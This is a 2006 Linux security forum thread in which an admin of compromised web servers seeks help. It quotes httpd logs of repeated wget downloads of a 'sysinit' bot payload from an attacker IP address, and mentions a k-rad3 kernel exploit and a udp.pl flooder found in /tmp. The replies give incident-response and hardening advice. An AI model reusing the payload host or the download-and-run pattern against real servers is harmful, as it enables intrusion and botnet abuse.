Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
Notices |
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
Are you new to LinuxQuestions.org? Visit the following links:
Site Howto |
Site FAQ |
Sitemap |
Register Now
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
|
 |
02-14-2006, 03:09 PM
|
#1
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Rep:
|
DDOS/Hack? Need help to intepret and hunt source
Hi guys, happy valentine's!
Well, i got a problem with some of my ads servers (running just ads).
Recently I realise the following log entries in my /var/log/httpd/error_log, in all 4 servers (they're load balanced)
Quote:
--05:10:24-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.2'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.19 KB/s
05:10:26 (45.19 KB/s) - `sysinit.2' saved [31,973/31,973]
--09:08:35-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.3'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://212.78.204.20/pussylick3rz/sysinit/ [following]
--09:08:36-- http://212.78.204.20/pussylick3rz/sysinit/
=> `index.html'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.tripod.lycos.co.uk/error/404.phtml [following]
--09:08:36-- http://www.tripod.lycos.co.uk/error/404.phtml
=> `404.phtml'
Resolving www.tripod.lycos.co.uk... 212.78.204.130
Connecting to www.tripod.lycos.co.uk[212.78.204.130]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:08:37 ERROR 404: Not Found.
--09:09:46-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.3'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://212.78.204.20/pussylick3rz/sysinit/ [following]
--09:09:46-- http://212.78.204.20/pussylick3rz/sysinit/
=> `index.html'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.tripod.lycos.co.uk/error/404.phtml [following]
--09:09:47-- http://www.tripod.lycos.co.uk/error/404.phtml
=> `404.phtml'
Resolving www.tripod.lycos.co.uk... 212.78.204.130
Connecting to www.tripod.lycos.co.uk[212.78.204.130]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
09:09:47 ERROR 404: Not Found.
--09:25:53-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.3'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.14 KB/s
09:25:54 (45.14 KB/s) - `sysinit.3' saved [31,973/31,973]
--09:31:50-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.4'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 39.88 KB/s
09:31:51 (39.88 KB/s) - `sysinit.4' saved [31,973/31,973]
--09:53:35-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.5'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.13 KB/s
09:53:37 (45.13 KB/s) - `sysinit.5' saved [31,973/31,973]
--10:09:14-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.6'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 37.61 KB/s
10:09:15 (37.61 KB/s) - `sysinit.6' saved [31,973/31,973]
--11:45:01-- http://212.78.204.20/pussylick3rz/sysinit
=> `sysinit.7'
Connecting to 212.78.204.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31,973 [text/plain]
0K .......... .......... .......... . 100% 45.06 KB/s
|
It goes on and on...
i tried to visit the url but came up to a lycos error saying no such page...
how can i go about to find out what started this page request? wwhat's the best way?
i'm damm lost and fustrated... :S
|
|
|
02-14-2006, 06:09 PM
|
#2
|
Moderator
Registered: May 2001
Posts: 29,415
|
the following log entries in my /var/log/httpd/error_log (...)
=> sysinit.2 (...) 100%
Looks like an IRC bot.
i got a problem with some of my ads servers (...) how can i go about to find out what started this page request? wwhat's the best way?
Have you checked all running processes and temp dirs for these or any other anomalies?
Other logs? Chkrootkit or Rootkit Hunter (will probably find nothing)?
Checked for running any vulnerable apps on the webserver?
|
|
|
02-14-2006, 10:00 PM
|
#3
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Original Poster
Rep:
|
chrootkit hunter? is that a app?
My servers are basically running only httpd, named, mail. nothing else... what to look out for here...?
other than put a REJECT in iptables... which i will be
|
|
|
02-15-2006, 09:52 AM
|
#4
|
Moderator
Registered: May 2001
Posts: 29,415
|
chrootkit hunter? is that a app?
Search engine, your friend, is.
My servers are basically running only
Is this a guess or did you actually *check* it?
what to look out for here...?
Anything out of the ordinary. Could also be something that should not happen, for processes like running the max amount of children, for files setuid root in temp dirs. Anything in error logs. Any files open in unusual places.
|
|
|
02-16-2006, 03:38 AM
|
#5
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Original Poster
Rep:
|
ahh sorry for my answers...
i do mean that i know those are the services that are running, of course there more...
sorry man, cos i'm really still a greenhorn when it comes to this, thus my questions/answers are like this...
thanks for your patience with me too!
|
|
|
02-16-2006, 07:47 AM
|
#6
|
Moderator
Registered: May 2001
Posts: 29,415
|
sorry man, cos i'm really still a greenhorn when it comes to this, thus my questions/answers are like this.
Don't be sorry, just give us some info to work with please.
thanks for your patience with me too!
No thank *you* for reminding me. I *really* should be more patient...
|
|
|
02-21-2006, 02:50 AM
|
#7
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Original Poster
Rep:
|
ok recently i just had a new case...
found that they (whoever they are) put files in /tmp.
There's a few .c (apache modules?) files there, whose uid:gid is apache. one of them is k-rad3.c, which after googling it, is a rather new script but its known.
have some other .pl files (let me know if you want me to post the files up)
What happen was that I had a bandwidth spike, and nobody could access my servers. I went to the server I suspected and lo and behold, the load was hovering around 1+, and it has a script call udp.pl running. I needed service to resume asap, so i issued a kill -9 on it... but alas i found out only later that i should have at least done a 'stat' on it to find when it was created...
anyway, upon killing it, the load went down. my network is normal. My boss ordered me to reinstall the OS etc... but as all the servers in the same farms have the same kind of files found (but strangly it only runs on this server), i'm concern as to...
1) how did it find its way into the server in the first place
2) what is actually running them... automation?
it always left records in the error_log of httpd, thus allowing me to see which ip address it is connecting to to download a file call sysinit (which i believe is running it these events..)
I have in place iptables, blocking in/out traffic to the ip addresses i saw. I have no SELinux in place. essential?
I read abt mod_security. useful?
As I am typing this, I am restoring the affected machine, while leaving the other 3 alone first.. so hopefully i can get some pointers from you guys....
|
|
|
02-21-2006, 04:28 AM
|
#8
|
Senior Member
Registered: Sep 2005
Location: Out
Posts: 3,307
Rep:
|
Is your machine currently connected to an IRC server? Do you do IRC yourself?
Do you have gcc installed?
Do you find anything interesting in doing this:
Code:
strings /proc/kcore | less
then search for JOIN by doing this:
|
|
|
02-21-2006, 07:11 AM
|
#9
|
Moderator
Registered: May 2001
Posts: 29,415
|
found that they (whoever they are) put files in /tmp. There's a few .c (apache modules?) files there, whose uid:gid is apache. one of them is k-rad3.c, which after googling it, is a rather new script but its known. have some other .pl files (let me know if you want me to post the files up)
No, k-rad3 is rather old: (Kernel <= 2.6.11) see CVE-2005-0736. If it's not been compiled: good. If you run a kernel upgraded to latest: good. Any accompanying Perl files usually are flooders, backdoors and IRC bots. If you could save me a tarball anyway and email me a temp D/L loc I'd appreciate it.
What happen was that I had a bandwidth spike, and nobody could access my servers.
Nice incentive to go looking but a bit fatal (too late). I hope this leads to more detailed monitoring and using auditing apps.
lo and behold, the load was hovering around 1+, and it has a script call udp.pl running. I needed service to resume asap, so i issued a kill -9 on it... but alas i found out only later that i should have at least done a 'stat' on it to find when it was created... anyway, upon killing it, the load went down. my network is normal. My boss ordered me to reinstall the OS etc... but as all the servers in the same farms have the same kind of files found (but strangly it only runs on this server), i'm concern as to...
1) how did it find its way into the server in the first place
By running any unpatched PHP application most likely.
2) what is actually running them... automation?
A set of URI's instruct to download the stuff, then use PHP system() to run it. That's why it's running as user Apache. Quite convenient because you don't need any higher privileged access to the system.
it always left records in the error_log of httpd, thus allowing me to see which ip address it is connecting to to download a file call sysinit (which i believe is running it these events..)
Search this forum for recent threads about sysinit and you'll also find out more nfo about hardening.
I have in place iptables, blocking in/out traffic to the ip addresses i saw.
...but you don't run egress filtering
I have no SELinux in place. essential?
Probably, but it probably will take some time to configure well. Other option is the GRSecurity kernel patch (incompatible with running LSM).
I read abt mod_security. useful?
Yes, but you'll have to tune your regexes.
As I am typing this, I am restoring the affected machine, while leaving the other 3 alone first.. so hopefully i can get some pointers from you guys..
1. Harden the boxen. Search this forum for recent threads about sysinit and you'll also find out more nfo about hardening. Check out the LQ FAQ: Security references.
2. Regularly audit the boxen.
3. Update software always: there usually aren't any qualitatively good reasons not to. If the argument is about legacy apps or breakage then the focus is dead wrong: use a staging server to test, or try to counter with estimating the cost for downtime and mop-up *after* the boxen where broken.
4. Apply ingress and egress filtering.
@nx5000: Is your machine currently connected to an IRC server? Do you do IRC yourself?
Good questions. Any admin that uses a production box as his/her own playground isn't being professional and should be "re-educated".
Do you have gcc installed?
One of the textbook hardening procedures, restricting access to any compilers. Unfortunately doesn't stop anything if you can introduce and run prefab binaries.
|
|
|
03-30-2006, 05:51 AM
|
#10
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Original Poster
Rep:
|
hey guys...
i have installed and ran both chkroothunter, and rkhunter, both give me good results other than 2 vulnerabilities listed by rkhunter
1) SSH v1 Protocol used, Root user allowed login
2) /etc/.java - citing there's a vulnerability in the folder, asked me to check folder
For (1), I have already "DenyUser" in sshd_config... no idea why they still mention that
For (2), I took a look at the folder and there's only a .systemPref
Can anyone advice me?
Also, seems like rkhunter and chkroothunter is not compatible with RHEL4. If so, what you guys recommend for use with RHEL4?
Many thanks!
|
|
|
03-30-2006, 07:22 AM
|
#11
|
Moderator
Registered: May 2001
Posts: 29,415
|
1) SSH v1 Protocol used,
In /etc/ssh/sshd_config: "Protocol 2" (or 2,1 but ONLY if you have clients that dont understand protocol 2: so usually not).
Root user allowed login
In /etc/ssh/sshd_config: "PermitRootLogin no"
2) /etc/.java - citing there's a vulnerability in the folder
Known false positive: check your rkhunter.conf for details.
For (1), I have already "DenyUser" in sshd_config... no idea why they still mention that
Give *exact* output /error lines please.
Also, seems like rkhunter and chkroothunter is not compatible with RHEL4.
Why not? Give *exact* output /error lines please.
Many thanks!
The last posts in this thread where made Feb 21st. You didn't care to respond to those.
I'd rather see you read those posts and doing something with the advice than just *saying* "thanks".
Those are only words and dont mean a thing.
|
|
|
04-12-2006, 05:21 AM
|
#12
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Original Poster
Rep:
|
Quote:
Originally Posted by unSpawn
1) SSH v1 Protocol used,
In /etc/ssh/sshd_config: "Protocol 2" (or 2,1 but ONLY if you have clients that dont understand protocol 2: so usually not).
Root user allowed login
In /etc/ssh/sshd_config: "PermitRootLogin no"
2) /etc/.java - citing there's a vulnerability in the folder
Known false positive: check your rkhunter.conf for details.
For (1), I have already "DenyUser" in sshd_config... no idea why they still mention that
Give *exact* output /error lines please.
Also, seems like rkhunter and chkroothunter is not compatible with RHEL4.
Why not? Give *exact* output /error lines please.
Many thanks!
The last posts in this thread where made Feb 21st. You didn't care to respond to those.
I'd rather see you read those posts and doing something with the advice than just *saying* "thanks".
Those are only words and dont mean a thing.
|
woah, steady  my words of thanks are from the bottom of my heart  really! my apologies for any misunderstanding here
I just got back from an oversea attachment, thus i could only reply now as I was in an area with almost no internet connection (Vietnam) and didn't want to access the servers via those cafe
Quote:
from rkhunter
* Check: SSH
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
|
For the above I already have DenyUsers root in my sshd_config but didn't use "PermitRootLogin" option (commented off)
but essentially, both works the same way yah?
After I uncomment it and used a 'No' to it, it was ok.
For the protocol issue, it was commented also. If I don't specify, it will allow both 1 and 2 (like Protocol =2,1) ?
/etc/.java issue
I found the following in the conf file... i should enable it?
Quote:
# Allow hidden directory
# One directory per line (use multiple ALLOWHIDDENDIR lines)
#
#ALLOWHIDDENDIR=/etc/.java
# Allow hidden file
# One file per line (use multiple ALLOWHIDDENFILE lines)
#
#ALLOWHIDDENFILE=/etc/.java
|
RHEL4 Support Question
Quote:
[root@server rkhunter]# rkhunter -c --createlogfile
Rootkit Hunter 1.2.8 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped!
|
For chkrootkit, i misinterpreted the faq, thought it was refering to the distro, but its actually kernel version
For laughs...  this is what i saw
Quote:
3. Supported Systems
--------------------
chkrootkit has been tested on: Linux 2.0.x, 2.2.x, 2.4.x and 2.6.x,
FreeBSD 2.2.x, 3.x, 4.x and 5.x, OpenBSD 2.x and 3.x., NetBSD 1.6.x,
Solaris 2.5.1, 2.6, 8.0 and 9.0, HP-UX 11, Tru64, BSDI and Mac OS X.
|
Ok, really, thanks for the attention 
|
|
|
04-12-2006, 08:37 AM
|
#13
|
Moderator
Registered: May 2001
Posts: 29,415
|
woah, steady (..) I just got back from an oversea attachment
OK, OK...
(..) Vietnam
Add ten points if you did manage to eat Durian...
but essentially, both works the same way yah?
Since there is a specific config directive "PermitRootLogin" I would argue it's *not* the same, but to be clear I'd have to look in the OpenSSH code how it's handled.
If I don't specify, it will allow both 1 and 2 (like Protocol =2,1) ?
"2,1" means prefer v2 and fallback to v1. There's only a few occasions where you would need v1 compatability and if you need it you would definately know. I specify Protocol=2 on all my boxen.
/etc/.java issue I found the following in the conf file... i should enable it?
Yes.
RHEL4 Support Question (..) rkhunter -c --createlogfile (..) Determining OS... Unknown Warning: This operating system is not fully supported!
I posted a script here at LQ-SEC and to the Rkhunter mailinglist to update sigs for releases that aren't supported yet. Check if you can use it, it's here: Announce: Rootkit Hunter: updating hash database (script).
For chkrootkit, i misinterpreted the faq, thought it was refering to the distro, but its actually kernel version
Affirmative. Cuz chkrootkit doesn't do distro/release specific checks like Rkhunter does.
Ok, really, thanks for the attention
NP. In the end that's what we're here for: to help you help yourself, essentially. Now the most important questions are: 0) what's your analysis of the situation (after auditing the box) and 1) what are you going to do? I mean, we've posted a lot of stuff that should help you combat this problem and I sure would appreciate to know.
|
|
|
04-13-2006, 07:17 AM
|
#14
|
Member
Registered: Apr 2005
Distribution: Red Hat / Fedora / CentOS
Posts: 508
Original Poster
Rep:
|
Durian?I Have that in my country
But I didn't eat durian in Vietnam, lots of beef though
so its ok if i explicitly specify version 2 only?
well.. since the rootkit check softwares didn't show major malicious stuff... i did more search and i found out i can make /tmp non-executable by issuing a noexec in fstab.... though not sure if i did it correctly, but i tested nothing could be executed (those 755 scripts loh)
then also.. when i had the "attacks"
I found some of the files in /var/tmp (by stroke of luck cos I didn't find any irregularities in the logs)
so following some online research, I delete the folder and create a new one in place of it, which softlinks to /tmp
basically....
/var/tmp -> /tmp
so far.... still ok... but i am sure i can do better things with it... just that i haven't find out 
|
|
|
All times are GMT -5. The time now is 02:39 PM.
|
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.
|
Latest Threads
LQ News
|
|